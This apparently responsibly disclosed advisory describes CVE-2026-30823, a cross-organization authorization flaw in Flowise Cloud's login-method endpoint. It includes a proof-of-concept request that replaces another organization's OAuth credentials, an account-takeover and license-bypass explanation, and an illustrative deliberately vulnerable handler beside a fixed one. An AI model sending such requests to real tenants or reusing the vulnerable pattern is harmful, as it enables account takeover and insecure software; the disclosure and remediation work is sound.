Introduction
This post documents a security vulnerability I identified in the FlowiseAI platform.
The issue is an Insecure Direct Object Reference (IDOR) combined with a Business Logic flaw in the authentication configuration endpoint responsible for managing SSO providers.
The vulnerability allows a low-privileged user to modify the authentication configuration of other organizations by manipulating the organizationId parameter.
The issue has been assigned CVE-2026-30823.
Summary
A critical authorization vulnerability exists in Flowise's authentication configuration API.
The endpoint PUT /api/v1/loginmethod accepts an organizationId parameter from the request body but does not validate whether the authenticated user actually belongs to or has administrative control over the referenced organization.
Because of this missing authorization check, a low-privileged user can:
- Modify the SSO configuration of any organization
- Enable Enterprise-only authentication features such as SSO/SAML
- Redirect authentication flows to attacker-controlled OAuth applications
- Potentially perform account takeover attacks
Affected Component
Endpoint: PUT /api/v1/loginmethod
Platform: Flowise Cloud
Functionality: Organization authentication provider configuration
Root Cause Analysis
The vulnerability originates from missing authorization validation when processing the organizationId parameter.
The backend logic directly accepts the organizationId supplied in the JSON request body and applies configuration updates to the corresponding organization record in the database.
However, the server does not verify that request.user.organizationId === body.organizationId, nor whether the authenticated user has administrative privileges over the specified organization.
As a result, any authenticated user can submit requests referencing arbitrary organization IDs and modify their authentication configuration.
This creates a classic IDOR vulnerability combined with a business logic failure, since authentication configuration is expected to be restricted to organization administrators.
Proof of Concept (PoC)
Prerequisites
- Flowise Cloud account (Free tier is sufficient)
- Valid authenticated session or JWT token
- Knowledge of a target organizationId
Malicious Request
An attacker sends the following request:
PUT /api/v1/loginmethod HTTP/2
Host: cloud.flowiseai.com
Cookie: token=<ATTACKER_JWT_TOKEN>
Content-Type: application/json
Accept: application/json

{
  "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
  "userId": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
  "providers": [
    {
      "providerLabel": "Google",
      "providerName": "google",
      "config": {
        "clientID": "ATTACKER_MALICIOUS_CLIENT_ID",
        "clientSecret": "ATTACKER_MALICIOUS_SECRET"
      },
      "status": "enable"
    }
  ]
}
Server Response
{
  "status": "OK",
  "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d"
}
The response echoes the attacker-supplied organizationId and confirms that the authentication configuration of the target organization has been modified.
Impact
Account Takeover
An attacker can replace an organization's legitimate OAuth configuration values, such as the Google Client ID and Client Secret, with the credentials of an OAuth application they control.
When users of the targeted organization then sign in via SSO, the authorization request is made on behalf of the attacker's OAuth application, so the resulting authorization code or tokens can be delivered to a redirect URI the attacker controls.
This may allow attackers to:
- Hijack authentication sessions
- Capture authorization tokens
- Perform credential harvesting attacks
License Control Bypass
The vulnerability also allows users on the Free plan to enable authentication providers normally restricted to Enterprise plans.
SSO providers such as:
- Azure AD
- Okta
- SAML providers
can be enabled without proper licensing enforcement.
CVSS Consideration
The vulnerability corresponds approximately to the following CVSS v3.1 vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
Estimated score: that vector evaluates to 9.9 (Critical) in the CVSS v3.1 base score calculator.
Mitigation
The issue can be mitigated by enforcing strict authorization checks when processing organization-scoped configuration changes.
Recommended remediation:
- Derive the target organization from the authenticated session rather than from the client-supplied organizationId, and reject requests where the two disagree
- Ensure the user holds an administrative role in that organization before allowing authentication settings to change
- Treat any identifier supplied by the client as untrusted input, not as an authorization decision
- Enforce authorization and license checks in server-side middleware applied to every organization-scoped operation
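The following is an added example, not Flowise's own code, showing the vulnerable handler logic described in the root cause analysis beside a hardened version that applies the remediation steps above. It is a minimal Express-style handler in plain JavaScript; the in-memory store, the shape of req.user (organizationId, role), the role name "admin", the plan names and the set of Enterprise-only provider names are all assumptions made for illustration.

```javascript
"use strict";

// Added example, not Flowise code. Two handlers for PUT /api/v1/loginmethod:
// the vulnerable logic as the advisory describes it, then a hardened version.
// Store layout, req.user fields, role and plan names are assumptions.

// Constructed in-memory stand-in for the organization table.
function makeStore() {
  return {
    organizations: {
      "org-A": { plan: "free", loginMethods: [] },
      "org-B": { plan: "enterprise", loginMethods: [] },
    },
  };
}

// Assumed: providers that are only available on the Enterprise plan.
const ENTERPRISE_ONLY_PROVIDERS = new Set(["azure", "okta", "saml"]);

// Vulnerable: the organization to update is taken straight from the JSON
// body and nothing ties it to the caller's session or role.
function updateLoginMethodVulnerable(store, req) {
  const { organizationId, providers } = req.body;
  const org = store.organizations[organizationId];
  if (!org) return { status: 404, body: { error: "organization not found" } };
  org.loginMethods = providers;
  return { status: 200, body: { status: "OK", organizationId } };
}

// Hardened: session-derived organization, admin role, payload validation,
// and server-side license enforcement.
function updateLoginMethodFixed(store, req) {
  const user = req.user;
  if (!user) return { status: 401, body: { error: "unauthenticated" } };

  // 1. The target organization comes from the session, never the body. A body
  //    organizationId that disagrees is an IDOR attempt: refuse it, log it,
  //    and do not silently "correct" it to the caller's own organization.
  const organizationId = user.organizationId;
  const bodyOrgId = req.body.organizationId;
  if (bodyOrgId !== undefined && bodyOrgId !== organizationId) {
    return { status: 403, body: { error: "organizationId does not match session" } };
  }
  const org = store.organizations[organizationId];
  if (!org) return { status: 404, body: { error: "organization not found" } };

  // 2. Only organization administrators may change authentication settings.
  if (user.role !== "admin") {
    return { status: 403, body: { error: "admin role required" } };
  }

  // 3. Validate the payload shape before touching the record.
  const providers = req.body.providers;
  if (!Array.isArray(providers) || !providers.every(isProviderEntry)) {
    return { status: 400, body: { error: "invalid providers" } };
  }

  // 4. Licensing is decided from the stored plan, not from anything the
  //    client sent, so a Free-plan admin cannot enable Enterprise providers.
  const needsEnterprise = providers.some(
    (p) => p.status === "enable" && ENTERPRISE_ONLY_PROVIDERS.has(p.providerName)
  );
  if (needsEnterprise && org.plan !== "enterprise") {
    return { status: 403, body: { error: "provider requires Enterprise plan" } };
  }

  org.loginMethods = providers;
  return { status: 200, body: { status: "OK", organizationId } };
}

function isProviderEntry(p) {
  return (
    p !== null && typeof p === "object" &&
    typeof p.providerName === "string" &&
    p.config !== null && typeof p.config === "object" &&
    (p.status === "enable" || p.status === "disable")
  );
}

// Constructed request: a low-privileged member of org-A targeting org-B,
// mirroring the PoC body in the advisory.
const crossOrgRequest = {
  user: { id: "user-1", organizationId: "org-A", role: "member" },
  body: {
    organizationId: "org-B",
    providers: [{
      providerLabel: "Google", providerName: "google",
      config: { clientID: "ATTACKER_ID", clientSecret: "ATTACKER_SECRET" },
      status: "enable",
    }],
  },
};

// Run both handlers against fresh stores and report what happened to org-B.
function demo() {
  const s1 = makeStore();
  const vuln = updateLoginMethodVulnerable(s1, crossOrgRequest);
  const s2 = makeStore();
  const fixed = updateLoginMethodFixed(s2, crossOrgRequest);
  return {
    vulnerableStatus: vuln.status,
    vulnerableOrgBChanged: s1.organizations["org-B"].loginMethods.length === 1,
    fixedStatus: fixed.status,
    fixedOrgBChanged: s2.organizations["org-B"].loginMethods.length === 1,
  };
}

console.log(demo());
```

Note that the hardened handler rejects a mismatching organizationId rather than ignoring it: a mismatch is a signal of an attack in progress and should reach the audit log, whereas silently overwriting it would hide the attempt.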
Responsible Disclosure
The vulnerability was responsibly disclosed to the FlowiseAI team and assigned CVE-2026-30823.
References
FlowiseAI https://flowiseai.com